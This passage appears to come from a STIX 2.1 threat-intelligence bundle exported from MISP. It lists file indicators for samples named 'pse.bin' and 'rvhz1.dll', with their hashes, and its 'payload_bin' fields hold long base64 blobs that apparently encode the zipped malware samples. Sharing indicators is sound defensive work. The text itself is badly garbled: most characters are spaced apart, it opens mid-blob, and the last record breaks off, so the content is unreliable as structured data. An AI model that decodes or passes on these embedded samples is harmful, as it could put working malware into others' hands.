C Q A I A A 6 h 71 B R t s k H i u 4 C A A B Q A w A g A B w A O T J j Y z h i M j J h O D l j Y z U 2 M D k 2 M z Q w N 2 I 0 O D I 0 N D N i N z Z V V A k A A z x i D 188 Y g 9 f d X g L A A E E I Q A A A A Q h A A A A 0 z I K g F Q 8 w z H j / Y R 1 P v l H L F B i Z w g z y 9 w 9 S Y K 0 f A D t k G 5 j b f i w P N 0 3 B J m f 2 N c H h R 0 g L Y x a O k w d F w 17 s Z k H I U N A r O A 3 B 8 K C V c 7 u n l 0 / 4 J B j Y I q t + P g P X G d 2 p e 5 t 1 t e S m c k s x f y q T L r 1 l I R q S / 4 l y i t q A P U P h 7 r u q / a N j p w G 66 c O x I T + M z o t f 0 P c x E + x S z a n u d 7 z 3 P S q r s B J 4 E n a u c q 3 n G C C t x c 0 z m n m w B c z m L j 2 i e D n b + r e + F + 5 d 0 b j T t f 6 J i H + y l 5 w B l r S M h c O W 2 o b r S F 6 z s M L g L J r j Y F b O H b 7 J 73 d a a y 6 D z a 8 J A l m 0 B l i O p o 9 t o Z 9 L K T Z h P p f H Z 3 Q v v l Z V / b r h r m 7 B S Q 5 r O k B K u N V n I d Y c 6 U L 3 v I M T Y V j Z 6 P t / r i j D Z Q 6 d V n s B P g k y B G K m o b j g L 0 S h V k O H / p J t G S q B m A 3 k L + 403 Z j x 5 z 7 a K 6 d 6 c d y h X G z o Q O H f D h s T C H B S w 2 H Z i 1 W X a / 2 M 0 8 w E k v E 3 Y 5 i p 5 O P k v H z l u d T Q e n 4 E a 2 a a k i O c B j t k z 4 g T Q b 69 + y M s f + S N U 44 E w X O s S / b R z Q o f G / r O K E m i Q u t M c Q o V s g E e N 9 P U Q r c X U B 3 w N s d z l 9 G q v N l C B j G P w R 47 h / F L s l v v 0 T G r + Y w w A 3 P z x S s 2 c H e + 7 s F M 3 K v a 0 d V 0 31 T H w 75 Z f G 5 M F m 9 E r d w D G L k Y c 34 B V A I L 7 x 6 t g 4 g 0 W C p Q F d c Y u C T 8 u m e P 5 R F P + b L z 28 A A Q K Z a J L k m l d P o Q u 1 O 9 K + I c Z k N + X T W I 0 7 v O s o Q u H 7 + l G z P c 7 e X f n x 1 Z J Q G i T C c P a y K F C 5 k 5 q B 4 N q R J r n E j u B Q S A V L O 11 z B V 9E7 i T 7 w j o p 55 E X f o s 9 S k J 1 Y J x S j M n x f U j E A W v 1 v A 2 / + 3 b L F h P i S b Z C E 8 e Y c X 0 t D + u W 8 A k N F T p X i e Y f K u 6 W l 742 S i M Y H 6 m 2 P 2 D s I y F r D o a n C 4 C w h B v S + B j z 86 r i o / X l 0 y 8 R b J 0 e q p F i Z N 2 B j N / h y v B R p a D O y p 84 S t y d X / t e T y e H 4 m D Z P y v Y 82 G A B s z 7 o W 2 O k G 8 y H j h j 8 C o e j q L R y F 0 q N 5 F r + C w v N u K T t f 5 G K L e m + A r w Z o R A H l p 38 T M Z n T z c g U d E Y C W 4 A 5 c p J E C / E d j d e + P 6 M G v 9 + m H w K C g X 7 z g R c g L D 1 s b G o L r W o e 9 d f 5 F K Z n e 9 / 31 O R p / M s k e t Y Q f e 9 w X h W A / y 3 S M S Y H V z 4 + S j r q F 74 H y W x D X u j p P r 73 s N O W 9 r Z q 4 N t O k u l N Z 0 h N C y u v b j Q j g b X B l Z W 1 U i 58 y 5 o B D s g 2 D w J H 3 h 3 y B L f k t p i s + l y M J F 2 G Y j v Q y W l / A Z C S y 7 o w c L O 8 J O 8 g e E j 9 J 2 y 1 C y F o T o X b O W p v j P V h n 7 g 6 N C P 1 D Q M t l F 0 / t q 8 h l L r P D 25 s U + 2 L 9 Z s l 3 Z 0 Q M s 4 l i F c M a / P S q 6 d E S B U g 71 p x u M S x u m E I L 4 N 8 V c B v 3 D E G i 9 c c z 6 R G a j w F Y M u C 12 P 7 X j 8 r z 7 F W W o I v H j H c i E 6 E I t d K u d p D 5 D 692 j c p Z X R 9 z e s b w x H t W / 4 I 98 o h q O p 9 K F 69 j j 1 Z b V 1 B P K F m y N 6 T P i p U x X H L e u 9 I F 4 U 8 o W 6 K i Y f / Q H e J d I 0 O w t m O D g V 4 y v o 7 f 9 w e R 4 N 3 q D i i Z y G / H 0 + b m H F D h X v X O Z v y T g t A p m a J + E W 0 R N L D v E z k b O M P c w Q Y 5 I 6 w N d E P G u j V o j 6 m Y 9 / I G J p J o O o 0 y D 2 i a 6 w n u + q V 6 g h Q o T c i / p Z v 3 T W g G E q G S n 8 L C 3 j N y U u J c a 4 / 5 J o x L y K I S 5737 j S R q o k v 9 r J n W Z A W 6 D h b f K l s y x o m H 5 y a f u S k 8 m b D r X I / v u K M / k I k X 2 C V m J D s S J J L H H q X S k 9 U j h I y D 2 + T m Q S K 4 Y Z e h U U J + R Y r 9 r B c 3 o m K o b J + Z y k 1 x j g 205 o I h r r + l G L I o 9 t V J Q r C Y o l V n j P v o G A u 9 k Z E u 8 f O a 3 Z q e r w B E 8 i W m I i i / X g h 7 n A 37 I f n 7 w g s L 86 P L y z 7 V V L 6 G 2 N b b 7 X 1 W T k X Y Z 3 c m T O 6 C a Z k r x R i T D H J c 7 K 8 t a p E Q z + A q m O a 5 Z 72 / n 1 z N S 7 C r z h + L 2 X Q T J 3 M e a y q a J Y u r 2 I R c v P Y I g h x U J 2 x 4 O V I R 8 s K X O r C J 9 G b P K 18 M S h 2 t p D z Y C j b R f u 3 L L Z Y Y C R Z 6 k / + j W L n Q e c C H r a U z I J Q e R w p w h V f o c D v Q x Q n J l 2 T 3 m Y q O c C P s P U C D A h M r J V 6 l A p I S m 0 v f V j l B m c u o l I Q L T x y U T G z K y / T B Q T 9 j 0 V N a x c P c 2 b f 7 / C 1 Q t 7 F X w R d c 6 F H 8 O G D i O l O 1 C T a b I N 7 G u K K c 27 D + w W L C Y n I r I v D a 6 O S 7 X 8 f z g Y n + q C M j 4 l Q M A D T D / p C 6 s L d C h + 5 i P B g d a D X p C Z j c d R r 93 I o h Z h j W m t O c u O g s o 6 b S 7 Z 5 f + h M x U M t V H q e a Z I D 0 K J l P u u 39 B B M 5 d q 9 e y M V a X H j V P + h V 3 S u g D 0 + x 2 P m V A L x 32 R 9 N 0 u 80 f E z v 39 V V 7 R 2 j / 3 e V m 1 R b f b u v 7 N S 57 d y k 0 9 P i J s l 0 + T w 7 k a L F I X k z V 9 V 1 H e F H L P V y P o R 7 j I P l y D 1 W T f i X 8678 b P b F O x 44 s B L w b T R 1 o h x i i Q 4 s N h j E W a N y i 6 Z R z E f S t 5 c a p s N L h A Z k o K L Q O E N Z L l x U 8 V S S o i m b v d M 6 C b b 3 g z b F 1 p l 7 L e A 4 x / q R B n X 73 Q N C d k f J C g p T j 6 F + Q m Q + h H v O e 8 k q + 1 z 0 K 9 C k y / t E P 3 Q m v X K F e + o h i Z F 3 w s u P 7 U H t G K v l 57 c Z r C l w S F f 5 t n B J Z 7 Y 1 U b L u P 39 h C Y v C t U h a 8 + I s U u 0 G E C t S m L d m R f 26 v 5 F 9 A m L x J z X y M h T e m 9 R M / x V b 4 K T R N 0 e n 7 X + k d i E U U g 9 T 2 m z z S Q J u B m M 2 r o v / Z 65 z m O f 2 k X Y O t l M q 7 E M S 6 R O Y e d M B 2 R N o B o / A W e j p f I k k g U a i E O Y Q r k p k k u 4 k M c / O Y k v / T L 0 O Y l L S k i F R + q q x q s I m a z Z 6 k W p 3 g i w G F 3 o t p w t J + g Z c q V w q n D j q K q L h D w c m C R g k h C w q 59 y c I l J r Z o j R W q Z P a Q r v 5 M g 6 b n U f F u j L r 0 F q r j n T N v i r H s r e W M H R u M G n 2 B 7 i T w q 3 + h Z H p Z 2 l o 9 Q e f S L 79 S 9 o 8 f 7 u S Q G i c f B 3 S I T x 5 j A v c I r a o 6 Z e 6 K P y a k s V O H N 4 b l j s B 70 U T K o q + c D E u b H 9 X T Q L v + 2 u w 6 T e b y T 3 e T H H g T j D x a h H D L R o q M 4 f v E K D v t S c R 3 e J 7 L R x 4 n q 0 / s y + + W t i Z 7 Z K M 113 q E W K p i V P C e 7 Z z Y p T O f S x J w E Z 8 c f y G 6 f S a 5 k V b a z n n p f S 9 m X K L m H g f l x V u Q K T r 8 t a Q e n T D Z + g L 1 j V Q v k c Y z 90 f y W Y I i 2 W H W Q 6 F b d 1 l J X m h 2 + 8 h b 55 C D W n w W 6 W h D q O 7 X 3 C T K k G 71 v 9 X / X D L T u i Z a H U 74 q z 4 F R J M 9 G l v v A F f U 7 L J 2 g b N G T z 2 j l 8 V m 7 D C a G P N s B M j p p U j r O S Z n g k l h s l M N D 7 u X q w / D 5 q d 8 T 5 f u R z C j x 0 Z R 2 Z 308 r l 5 n 9 I J e 0 D o V G A v J 8 l d r P o 5664 d I L W g q H O b L t L d F 6e5 L p h P x k Y P K d n 2 w F 1 X O T W G l F L H r + y B M 8 e n S K m R V x 6 G U y p M h j f 26 S U 3 x z V P z M i Q E U l d l E v U M t y 9 i +
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-15T20:09:07Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--46037d3e-727a-4508-8dcb-d10de58a764f" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-19T19:06:06.000Z" ,
"modified" : "2020-07-19T19:06:06.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' d f b 1 f d 17182503 b 2 f 15 f b f 6 c 5 c 30 f f 71 ' A N D f i l e : h a s h e s . S H A 1 = ' 4 b c 94298 f 3 b 7 a 33768718 e a 309 f 9223 d 3 a e f 3250 ' A N D f i l e : h a s h e s . S H A 256 = ' 1e4 c d f c 57086203 d c e 60611 c 3 a 7397399199962 d c 4 b d 4 f a 984 b 0 f f 0 a 27 f 8 c 3 a 9 ' A N D f i l e : h a s h e s . S H A 512 = ' 58 a 340497 a 5 d 8 c 5 f 2531 b a 67 c 6e2 e e f 63768 c d 7 c f f f 5 c d 72 b b c 23104 f 3e98 c e b 676e0 c e 369 b 7310 f 43 a 42 a b a 0 8884 b e e 26797 c f 79 f 1 d 56 d 38 d 11922 f 6 d 18 a b 0 5 ' A N D f i l e : h a s h e s . S S D E E P = ' 384 : x k H Y 4 g u h Z u o g d d + K E i C Z f l / y G F j 0 K d H f 4 g p h Q T D H z J 8 k 6 X 5 i h H f z w y U / 9 t R K h D 27 : f 4 J h y m i C z / 7 m k 3 Q H H a X I h L J U p K M s m ' A N D f i l e : n a m e = ' p s e . b i n ' A N D f i l e : s i z e = ' 280078 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A K 2 Y 81 D Z E g 0 H g U c A A A 5 G B A A g A B w A Z G Z i M W Z k M T c x O D I 1 M D N i M m Y x N W Z i Z j Z j N W M z M G Z m N z F V V A k A A 3 W Z F F 91 m R R f d X g L A A E E I Q A A A A Q h A A A A H E P C v G q 0 e Q q i j 9 X n A Y U D B + Q 2 x b W n X J / p N W v M W o Y P h / 0 Q J f l d D P O x i v g G W D f Y q 8 J S 0 F T b x y Q 8 Z m m z E C N F m N g 3 Y F O l A 4 y F K S N 7 g 6 f j 0 f D X w B q w d D 9 U F N M m J I V P l A Q / z S S 95 p L Z u B n u O 2 c 7 w k 8 T 6 Z D n p o W k S 7 I b 4 B F M 4e3 v j P s z T R C c i a l e D c s h c m 2 T 5 t a J W P z O P p d Y n v k j G r T 3 f D G v 5 N p r r + t p Z V q v Z T M Q D E r T U v l x / Y o B H g a X W u Q 1 C 5 L b 2 X O n 2 R 60 I u v U R L T W W t V a 4 a o + O N u a N h 38 K H 1 c b F N F 4 m Z K 1 d O 4 o i i C n W k 3 W e P M J p L 8 P 1 y D H o 8 i P q S h t a u B z f f 9 N B x 8 + t g M a M Y 7 D + J E v e Z b V z Q n q O 5 k U t h X J v 0 o T m Q c 9 w D Q C w R 6 T Y K e Q I j W J W t 76 D V I m 4 K A d y h n 18 J M z 9 c B 1 c 94 E T h Z z W s K Q o v q c L 3 s i 1 Q O L + n j 95 a k D p u A 2 q M 3 + 9 a Z X U e C + 9 g T B 2 a D / P T O / U 8 v S 0 c E s g y p h Y 1 n f s C 0 3 u 9 e k y 93 G 6 O 2 M k s k p q U y C T p F g E 3 G l T F P V 88 j I k w + T 34 f e U y i j X 9 b L G / M u 4 M i 9 Y m Y c f D G O W j E F Q w s J i X K Y r M N Y h t 5 / + G W L y 0 O m C t O i i v 5 X 5 X T L c 8 f B P E R o l l i C 2 U / 9 k L P d S x R k U b u k + I 2 h F M i o F v E k U D e y W z N Q q O G 8 G a d F c a + S N t i f Q u Y i s L 2 G q c v G W L t W H 0 1 j N m T f Q H M J Y H g / G b a m u m m 8 q q c g n V V a 0 D T W B y o D q 9 z q U G E h U u r n a w y a h k 0 5 M U c x M V b G 9 I U K L + v X o Z g W X y k B 5 L g w L 1 U G 3 / e O y g t E c H n 1 h i K R u B M y u Z q f Y Q 5 l A N Y L X f E R 5 L h B 4 N v R G 0 4 O B B F 0 s V i I C B H H h 2 D W 84 z R / K j g F n C 0 B 6 d R J + P E M H S a w 7 + d q a 5 L N A h 7 y m T 7 P s B e y C G G m Y C V b j 2 m 1 a o K c L w x s Q I q H G I F 2 W T H 75 / T h u B k P i B j K c e O I j 1 n L H 5 D I v D L k g B Y 1 a 2 U I 76 M B y o h C g S N T 1 R + e 6 T 7 r 2 j / T B w S s h u q k j g v K 3 Y a Q q y A M T j X K u l C q 0 Q p k y L N z 62 D V i a 29 D q P Z 6 x g O E 53 X s r Z J 4 H d T 2 K O B 1 l o X / h M 3 z F 4 e Z 7 D 6 P 581 r q r c w k r r O f A H Q 2 I Y 0 / g 487 J V U I 560 n + i 5 n W r n O m 8 D 51 n Z T M + Z x J y 7 f V l p U U L B w q r k L Y s 2 C K V v K y R C F Q v 74 R 0 q w x w l x G j 7 Q J 62 a w r 6 E M t B L U i O 9 I q V J K 9 H 5 L Z A r H O x O Z A S S 2 i W O W Q H a i m A z f 5 o M 32 C 0 J 6 s 7 C g 8 e E E Q P 3 N L y R I G k 9 P u y k A r M I 2 R U K w + e 1 G z S 4 H d h 7 c I w 2 t x C a q M t c 0 Z G x 9 l T T G 5 y 0 e e i Y A C d G 7 S s d y V C w x 82 + u 5 o 6 Y K K y + W z / T D K a R 0 S K 5 a P o l B 3 x U / O l Y R I S m L 5 b 8 h w v f t Z Z U n G v F R D i k l l + e F C n h L K A Q A q L n T i H T c E A M V K g 2 V 6 A z 0 8 Y F I T F M Y c X P 4 Y n h r j 6 k 9 f i g 38 F f h p L Y A Z 3 w + w D 7 i Q m M l v a Y t y w + g e q x Z O S m 4 R 4 T r 7 X P w U Y + V 7 j m Z b F H y J 6 + / D D l d U j k s Y p n c M C l Q H d T p J A Q o 8 b H Q x y A 8 Q 9 x B 1 H o 7 F C A 2 C b Z v 3 u i 2 l J y q A S f g v 0 T y 7 V 6 T u o p m E 0 0 x k P 32 p z z n Q d 5 B 6 e G m 8 u D + X F G L v w C c X Y R S Y g q A 9 c x m K L Z T f t 3 V 47 W b L e Y v d D x p X A E B A s 1 X T / X x n S 1 l 8 f M B 4 x Z 0 W e t c w j s / H S e e P x M 2 H 1 v r v G K v 1 T X T Q w v 2 G H 3 x t y i t G m o v 0 k T Z i C U h n 5 N m N 4 J T 5 l f y M V g e v x S Q k m L R F 3 / F k j V d W u h e q + j 885 R 9 i j A o k 34 d G m 74 u 4 s R y z W y p Z S X W f z N Q L m e 8 Q X H 5 w C V K Z + F k C W 7 r E G A R s z z 7 I 447 B f + g v 7 C w M w 2 j k t 7 p X R u O u a I n x 76 X K H c R L 57 K a v v 5 R w b q Q Q E f e 0 J i w Q J n H s x j V 7 K d p 6 p I a e f T t u Z V M e i p A d b f 8 c U A h y x Y R z F i n g k k r r 1 X N N S j c P Y Z p a r 0 y N a 0 S q a u 0 N n L q H H t M g n 5 e B Z C f O s 2 n K d f M L / b G 9 y H 1 R B S 1 t g W J 0e6 b P 1 L R s K T t 95 o M 8 W O P d g M k o c R 8 Z 44 Z l J 66 L K 44 h f U X 5 A Q N B G 2 T r k r Z Y T 4 k 91 t Z h t b s Y l h P J + 72 M b 7 R X Q j Y 845 r t w C k l A P o o r F r B 0 W C b A m Y L 15 i K O 3 P X r N A 0 M b M l 90 H q E p L K C X p v D w q Y Z z H F T G v H k t E w H F z A S 3 w G h B T b E D O J s m b Z t 5 F 9 k Q g j o 1 l 7 Q 2 P e i C d 5 P l s 4 m p I B r 6 d L t 6 n y N X T R i q I N X n H T J v a a Y q A w 1 / p / v i W 4 t V d I i K y d L 51 u k Y W I z m z V C T U T m 0 2 c E i m e Y h Z E v / 8 A H 4 v D A 3 D N G 9 V R H J 5 W M n 7 w s 2 R T f + + K T J x X u L r T h //hs0G3dRpR7GWRJIFCFTGKOaREa6DOVsW4A80gU0q7aqWBlFel6+CiwdVBzkF9RKKa3OmHGeWngD7eYsiIxGY65pWYVwv8kFWS5ejxoTpoMiisj0+5DUdm4APdw/0p1iRx0CABUvZv1uv7r0KNYvIhcAwkA8q5+ee+b9YOphrgCJFl+5RIgRv15Mwo6h5bD9w9+NRrGfbTswrgvr0W65LJ7D9kwLg7ekmg6eRxnbg0GwijvEx0dvcIpWsu055pQreyJ9O9NU4+VLy3NX1HtnpvAUjSImLaIwsqIi0UjVGdZZ0HKL5Vw4oySSIl+e4KIaZgY3ZMXqmARe1Pt+H4l+ISImSQVqalifN/VxJCksK9wgq2ziXDuJR1Eu0fWk8K6L4PFNTrQa3CBnukh+QY+enxhS2VQKRT3s/LlURbkhDJlXfWlZDovk7KmTaWeSAnA5jTkmW4m83ziSYfyWUptiop/B0/mOEvqnTWay1SfH14CUFSY6CPCcPovtWMbAO06h1mtmDjecvs5ASdNbr7FAP1Ojaw6wDwWqsJb/6NBBC2Hhn0x1jHeWLJ+MmQFBlAHJN7foCwJwbu1/1W9qLksV9jxfUJQKmZx3nClgB+Key+IwtSWunCYDsOuECaldf6l3mC+/KVNQWNZmCLN0ABO64xOIpSRRl7b3SE+r/iTEs6rbX92SYLiKSLZKYFbYVPuUjZobpZ54LgGyVvBgpzhAfRMFD23EKwprXWY2xhqbxtV3yO/7K1KYVaEN79Y7TndyoyXL64WxS84YBm10odB9Nmqat5HjAKrnztzbLazugHT0iNiVS7LDTVnHm0xSMXPEWUyzO16sE2ABFJK7x1EXYTF98Lo1yJT6ugaXuxFOGAUdyBYJrBxX5SG7CKp/Igy8/+k+Ld2ivS071b6d4yM3fe62RUnHgLyPywA8bKKKG9js5LF1A7IbPqIvFDElAX7L5wCFhR5CiNVP+wxF5zolb1pXtfQGTMPfKlDaW2EYI7fK93bBo7jmlbqAYsfM/InhQv6NXCRvsQGyIcd73Pk8yFJLQv6mpfA0N6vWQMHJissMZZ3rkYbxRNjUiJazkbUY+6uALmJhb
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-19T19:06:06Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--612fb261-eeee-4173-a89d-074aad7c64d2" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-19T23:55:16.000Z" ,
"modified" : "2020-07-19T23:55:16.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' d b 91 c 4531 a a 46 c e 160 a 71 b 9 c 74 c 800 b b ' A N D f i l e : h a s h e s . S H A 1 = ' c f 45535 c 5 d 392 b f d 58 f b 385 e d b 46798 d 64793 d 98 ' A N D f i l e : h a s h e s . S H A 256 = ' 0 76547 c 290 c 80627993690 a 9e6 c 15 e e b 2 a c 9 b 86 a 9 a 33 a f 2 d 3 d b a a b 135 f 1 f 43 a b ' A N D f i l e : n a m e = ' r v h z 1 . d l l ' A N D f i l e : s i z e = ' 376832 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A O i + 81 C c o B 6 C c r 4 D A A D A B Q A g A B w A Z G I 5 M W M 0 N T M x Y W E 0 N m N l M T Y w Y T c x Y j l j N z R j O D A w Y m J V V A k A A 2 T d F F 9 k 3 R R f d X g L A A E E I Q A A A A Q h A A A A f z 3 c w D M q 62 K q s 79 C 1 M x r A K z 1 h B V c Z f 6 j 9 q T Q t f v V P h Q m 3 C Q 54501 J e 2 X 6 + T R e Y B W + S c W I G y c A R 2 B a 40 l m 93 o 9 T W h z d T h q x e f + R 2 Q u f / N 1 K o T I V G P R b t u i g y Y p l S Y z G O z a W q G O s M N N p R I H H 0 K U + X 91 z 9 D b 1 v p c 2 x Y + r a M r m f T N H U W + Q a c c G L D + 3 y o 8 U g K v E L e F O K q Z s E q 4 A N V x s 40 O L c f q K R S M t s j v U R 3 q y U O z B t i X e y C b f 4 i C P M 9 W X S E O R 9 v + X D n 9 Q a 7 + q W D t h f J d X 45 R V Y B U c Y n H I 4 e s T V 8 v t D 7 F v K i n p + m F A I 39 j 5 H a Z U 3 M G 6 L v m o I u L j x R Y w F d v W 4 C N m c O Y F j Q l 3 O Q j V W g 7 s O k 0 n 3 x u o v 8 C G f 29 V t 52 U X K t Z J m r 4 z v 2 n Q b D U / y 2 U e 0 X z q T q k C B a l d 3 x y 4 x Y g C b Y c 26 g l 3 u / 4 T + Z k 5 l N e R 8 F l c 3 H I 49 u Z X j L G N f h r 4 g Y k E B w f S R H a j L m B w H 4 e b 68 K v 5 R k Z L 9 s X b 9 y y G / z b y l E 1 S 3 i 7 y d A v e X x d H K B 1 T C C p I 7 U C r z o k K H p 0 s 8 P b 1 f M L s g r M Q 5 J E A 79 O C 9 d c e r 3 O z N f 0 X + m i S 32 x 7 d Q z l g S u C O 9 R 8 b Z R f n u C z U U R 0 Y L 4 s S w k Z 1 q d 53 w Q x Q R K B s 5 G 0 5 S E j 9 n e C 4 g t Z i F o B L Z H v S j 143 f K q Y j / 1 t R A d n i n C j p g b g 6 K 5 K v g p H 8 I 8 F w c Q p a B y B n 9 B J f b z c e V i H 3 n S W M t V D 1 U A W c e f 5 r y n C q o A a q n k F r C 7 b R 6 U 40 H U Y v h 8 r I 0 X T 5 Q 2 J y X l F H Z 9 X o l g f L P I R e A q f 8 D x d 8 K T a D C t q + H G h X x S P i K a 2 h E F M N 1 I p F r 1 d Y O 2 y J b V H o Z w A m I R 3 k r p P S p R 3 d + z D a D 69 a 7 p 477 q c J 7 y f d j B T / 0 X V r g G S W a / x A u o m O 57 X q l j V W L j 0 36 a 71 i 4 F y 38 O n 3 A w Z f n 2 R 2 l E M D 2 K n V l N D s o B G f m 2 u s 5 W v L j 5 b x w X 4 I I 61 t h t O E K + N G Y 3 j / x X O 4 H 3 H j 2 C m + W l 2 k z o e G n y a S + l b O 2 p X B H l Q 5 i 3 w Y h 2 r F + 7 / 4 W l M S b Z p k V c p P 2 r y D s r Q k / p 3 n 73 a V B D R K j + i y I f i S X Z H G I s X s q y T i 2E4 C G K N 2 r r n l t Z j t C S d H p 3 i Y h w I B 70 C z + 1 G O b m d P w A P Q Z 3 / t 1 w H x g w 4 c s b O y 46 G M C g A L k / c 0 8 W c r f k 3 H O m J C g d E C c n l f s U r Z Z D f o N 49 X E W 8 p w A A d 9 V q g k m 7 k Y l S f + H W p A 8 k x 7 e J y D x A g p i t 9 R f O 5 Z A N Z g S b g I m + 0 2 U Q w u 8 A 7 K s M j T z t j R / u + z V U 938 x R v C v v 9 v E h s u a u S Q 4 P P D 5 i U d N R y 4 d H b Y R U 6 O M L V 6 l O 3 a e r 9 r x 5 r J x q H H Q y d s U d R L d b t N B D + / B T J 2 O 2 o e g G / b G N f R V w v g l X Y E B t w z z q u d 97 R n y F k z H X Y W 2 h e r z 403 x 6 s A N n c U 5 O f S K 2 u F v a F U s a Z A i 8 I 6 a p m e 54 Y m 2 h L i x h w E 80 C c 9 m G L h q n + r p 1 D O s e / P w D H y h J o 21 j i 744 M Z 2 r K F j t B V 47 + M w p w f N i j T E c r j k P S h v / R u 6 k Z + Q k x l Y M 8 m C p q t v + 6 b d 8 o u H Z m J S H f a A 3 Z A L k d S k Z d b v Z L d C j I o w O 4 o P 0 u y m 8 j o q 6 W 5 t q p C U Z W k F N 5 q A Y E p j Z t / E h w U b N M 3 N f Z Q V h d 1 R O Z 0 / u n h h J k v W Q 2 h D d a z w P f + R p Z 6 P K 9 / q K k W G 1 m 4 h t 8 v E H h Y G l K y W V b r x A + B H o a Z m Y p i A h t T h W O F L 5 O n v g o 0 S 98 M X z / k Q R c y Z j s G W 6 n 8 + t e 8 C D 4 D z 8 T y w n / S g p i x X P L 5 i p q x p i r U Y i b X x 7 o 7 o B V x q b c P 8 d E C 70 + J 3 i q G Y 1 n W 7 D V k M o / e L N L u M R 1 p Q U w H D H 9 N v x 0 29 + s F w C / d S p z + e s T c G T M W T j H g I 9 P I D I O Q i 4 R 0 3 C h 6 e K I c 8 x o a 1 S h F g 3 I 0 9 T d b q H F u Q e c 1 / D k r 8 y M H 7 T l 3 P O U k c r T X v Q K g q t M U b f x l Y s H A H Q D n L c e i V e V s S q X l D g M D 5 o U v L C i x 3 w u X 7 H S 8 p / e p V L r k G x X E u Z a S r L d 47 B 8 V D i B T R s s D l E n v T V 2 D G h F l o D e 2 / U k h W 6 R B l f M Q x r y K j k h i N N T x 5 y D n q O H 9 X s D 3980 k c X 761 M z O U U S b 3 e i D 2 q g 8 g E u + i U x T H b 3 z k J 0 Y U M J N L 6 f R V q X r 1 Z z T 6 f i k V 7 J v u K V C Y H t z a W x 5 U E J Z P p J 8 o 3 k V t Q G c V f S r + k R 4 i N w A A V S L C s v l O Y n 7 K 2 r 82 V w y d B C A X 0 F i 0 d F / H u W j n K 5 b i + + G i W u a / u T Z t t t r j f / z / m / Q D l + H 7 P N y E Z g q W S 1 u 8e5 T z 2 T n I 7 h F i P H A I m u z z 8 r 3 Z Y n j 8 R k k 1 A 1 b c o W 0 K q 8 B s Q y V s 3 w d R L 9 d y / e 8 g k e X 76 g r g y 5 P E x J 5 O O w 8 n X W q / k y H j Z e u L S l 5 Z U 1 K o J x N v Z P x p k R W C F V r T Y g L G i p d j j e u F T N 8 f b a / 8 L 6 d b H 6 W g g D K t O 6 K i N O b + u / u V 8 H E d o V H Y 4 D / A f x t Q W 1 W v + g j f + d w O H u S q q G o I p d 7 d o Q O / U / 7 J 2 S U C v s K O h O 9 H b S P E l a z j W 2 p j 0 C N w a x T O 9 y J + 2 j p C T u G h T 9 k X c C W q m O q A A W X / Y w G i + e l 0 s G k A V s r 2 d X m v Z p L y B u n O W 9 p F T + N + f M Z k o 71 D b U m P o D v B T d h 13 f m 2 K c x v A C u c W p / Z 50 b A Z h g d u u O 7 z S H r 55 f k R 9 k n E n 78 y y c E s d k H G W 4 y M d I B x A k 3 Q 6 k g 7 R a 1 G y 2 l m h m S V 9 j P L X X 3 C V W L E f t J 1 e K o y S 4 H w X C F M q K 43 S s w B O W N F z 1 a H B j b T 9 + X L e 1 p x l I N L W F y h w a 8 U b Q N c + H m 8 P T h j I h S U s k l 203 o I s f z F N / a S 2 E V e H l / 36 K g k Y G d 1 f 6 a 0 I 0 5 r q K x X f C + r C d u h 1 B 8 j e + O q I l z T C x H n l j h K h a a n v K j O r j K n k 3 E v F x O 5 O 6 g V 0 P X K Z u f G F a t w H r m z K I X U + 2 h P Q u + W F a j N c A t J y a m X 11 m e F x N g Z v d c C X y 5 e u q 56 y y k A W U S R s p D w Q Y 1 I l M a 3 A S 9 q F D 7 + + Z o n D 9 T l s c l T D s r V f 8 H K 6 y R 4 F p c o a c h 3 E T B Y p F E P b q M G Q E x b + j h j V a k I j l W h Y F o b v H J d u 7 U L E k 2 Z w N 6 S W 6 p 7 Z u o N g Y 7 e h B E z W 5 O p Z S v n 6 m 2 b w q / Q 1 D z N A T 9 O 2 R r O r //bIPaGCetHR1rFkBuHodx+rT+bf5TbuK/eqS3VbHYfFyIqPSxiiq4xu0rsauIu9d8LLKoac4O10lxVS7Iw0c6akTUus7Pd/xlZeQwrw1fGQ1y84qHBmva9PlL2zhMyd94UGX1k5w4PbF01FZ+D3fq9TuyGTJAqAywycHh9wO1/5tLRKDj53QKS6zM82DQOzlZknF3Clby/Y5r5RLtpD35+2SnZbr29zHhr42XyYsglZTSnA3VSzLxRLFpzkmYH/olrxr0lMnV8fRO6OssmRpm3R0pJGUXiFSnruvDWobykVpaZaYdAh7Ye4F4F0ufOX9r5y3mezUY6m48l06DGvbSzXxij6LhIDtZDkwLJ5X/+WdaQz9ED2Hw/BOjnQxDj6AjNYRvdE9ny7AVY2tQthSiSeQXO9M6bg4NWbdei/FUw8F6UJjGlAlz2wZJht/pqkvV6RmPzo0xpceUOs/QqodUj8uyNOVwRE+svdm8rbBTnBb5ssW/tApAt2BjI/pqgJOKyM1wKKJl90v3KqpOeiuRjW9KOb7ZmryqjrHrTScbS3EQPpdDJnCo2lZX8KN84/QbzZ5vMtTgDahvIUCK2UIpjjdG94jsOQ/g81pn35jb8zR6yUJZDgZLS5fizFz/aASMUqYgljIZHAXWfTUHR8H6vR22uA28
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-19T23:55:16Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
